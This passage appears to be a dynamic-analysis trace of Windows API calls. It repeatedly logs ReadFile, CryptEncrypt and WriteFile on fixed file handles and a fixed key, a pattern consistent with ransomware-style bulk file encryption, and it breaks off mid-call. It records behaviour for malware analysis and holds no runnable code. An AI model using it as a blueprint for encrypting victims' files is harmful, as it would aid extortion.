1 [0272.786] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.786] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.786] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.786] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.786] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.786] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.786] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.786] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.787] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.787] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.787] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.787] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.787] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.787] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.788] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.788] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.788] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.788] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.789] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.789] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.789] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.790] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.790] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.790] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.790] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.790] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.791] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.791] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.791] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.791] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.791] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.791] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.791] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.791] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.791] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.791] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.791] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.791] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.791] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.792] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.792] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.792] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.792] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.792] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.793] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.793] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.793] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.793] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.793] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.793] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.793] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.793] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.793] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.793] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.793] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.793] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.793] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.794] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.794] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.794] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.794] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.794] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.794] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.794] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.794] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.794] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.795] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.795] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.795] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.795] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.795] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.795] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.795] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.795] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.795] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.795] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.795] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.795] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.795] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.796] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.796] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.796] CryptEncrypt (in: 